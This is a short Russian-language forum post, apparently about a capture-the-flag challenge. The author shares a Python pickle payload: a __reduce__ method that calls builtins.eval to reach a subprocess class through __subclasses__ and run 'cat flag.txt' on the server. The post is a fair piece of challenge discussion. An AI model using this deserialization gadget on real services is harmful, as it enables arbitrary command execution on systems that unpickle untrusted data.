03.06.2024, 13:51
|
|
Новичок
Регистрация: 05.05.2020
Сообщений: 0
С нами:
3171132
Репутация:
0
|
|
А я подупоролся)
Через subprocess и system не получил выводов и решил заабузит код инжект aka SSTI.
Python:
Код:
def
__reduce__
(
self
)
:
return
(
builtins
.
eval
,
(
"[''.__class__.__base__.__subclasses__()[367]('cat flag.txt',shell=True,stdout=-1).communicate()]"
,
)
)
|
|
|